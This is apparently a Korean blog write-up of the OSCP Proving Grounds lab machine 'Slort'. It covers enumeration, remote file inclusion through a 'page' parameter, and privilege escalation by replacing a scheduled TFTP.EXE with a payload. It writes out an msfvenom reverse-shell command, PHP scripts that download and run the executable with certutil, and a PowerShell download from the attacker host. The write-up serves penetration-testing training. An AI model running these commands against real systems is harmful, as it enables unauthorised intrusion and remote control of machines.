OSCP/Proving Ground
37. Slort (GET TO WORK) - Windows (RFI.php, systeminfo)
takudaddy
2022. 9. 3. 23:07
1. Enumeration
: port scan
![](https://blog.kakaocdn.net/dn/bkqJZC/btrLadABbgU/SZjhmbnt0jQXZ8zvBW8ua1/img.png)
![](https://blog.kakaocdn.net/dn/BiClS/btrLcI0oJS2/azElShA2Ftp8R1tyfRwN3k/img.png)
> Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
> FileZilla ftpd 0.9.41 beta
: smb enum
![](https://blog.kakaocdn.net/dn/mMmBq/btrLc7Z6fDU/M5i7vYWkikMckJGg9PRrN0/img.png)
> SLORT
: directory enum
![](https://blog.kakaocdn.net/dn/k7d0b/btrLecGV0ST/pFvKA2T30rf8e7RaHrZFP0/img.png)
: web enum
![](https://blog.kakaocdn.net/dn/cBDPGA/btrLedy4QKs/kOF02bsWfAewkzghVySIkK/img.png)
> page 파라미터
2. Exploitation
: RFI 시도
![](https://blog.kakaocdn.net/dn/b1HhxY/btrLcf48DqN/jLk4oKZNLZ7uElpJ1MJUH1/img.png)
![](https://blog.kakaocdn.net/dn/bV8hOY/btrLaWrANgM/8jkmq7Ov9RDvIRGFJAFEz0/img.png)
> 성공!
: reverse shell
> 준비물 : reverse.exe + 쉘 다운로드 명령 php 스크립트 + 쉘 실행 명령 php 스크립트
1. reverse.exe
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.148 LPORT=4443 --format exe -o reverse.exe
-----------------------------------
2. down_shell.php (타깃에서 리버스 파일 다운)
<?php
$exec = system('certutil.exe -urlcache -f "http://192.168.49.148/reverse.exe" reverse.exe', $val);
?>
------------------------------------
3. exec_shell.php (리버스 파일 실행)
<?php
$exec = system('reverse.exe', $val);
?>
![](https://blog.kakaocdn.net/dn/bAFQbg/btrLk4oKBGC/D7qRolj1cOO6ewg2coSy0K/img.png)
> 파일 다운 + 실행
![](https://blog.kakaocdn.net/dn/bfVOSq/btrLh86K8Fc/NnCVMgSVWTTB8E9QtDJ1zk/img.png)
![](https://blog.kakaocdn.net/dn/bmebQm/btrLgYRnizI/py9xRIpq351bRsTVA2YBt1/img.png)
침투 성공!
3. Privilege Escalation
: Clarify OS & Version details
C:\> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
![](https://blog.kakaocdn.net/dn/c2wR5P/btrLg8sTDja/W4gya3hfsQt3ttA2uRUZq0/img.png)
: Directory Enum
![](https://blog.kakaocdn.net/dn/MZYGR/btrLkavZiUY/OpF46dkKxXz5kftXYycGA0/img.png)
> Backup
![](https://blog.kakaocdn.net/dn/bvXxZc/btrLhQFen9X/OgRMHPXF05AIlFihqhaecK/img.png)
> TFTP.EXE 파일이 5분마다 실행 (아마 시스템 권한으로 추정)
> 해결 방법 = TFTP.EXE 파일을 reverse 파일로 변조
1) 미리 만들어 둔 reverse.exe 파일 다운
C:\> powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.148/reverse.exe', '
![](https://blog.kakaocdn.net/dn/cVyQQ6/btrLh9xOXFn/394LZ0XWkM0ZLFtvtVsWNK/img.png)
![](https://blog.kakaocdn.net/dn/dszMzv/btrK95v4nqI/ybC0JXDCeT6VegPes1y0kk/img.png)
2) 리스너 기동 후 좀 기다리면
![](https://blog.kakaocdn.net/dn/colzkk/btrLh9q2Zf7/1rPV9u3khWoFcDZP65Qlp1/img.png)
끝
728x90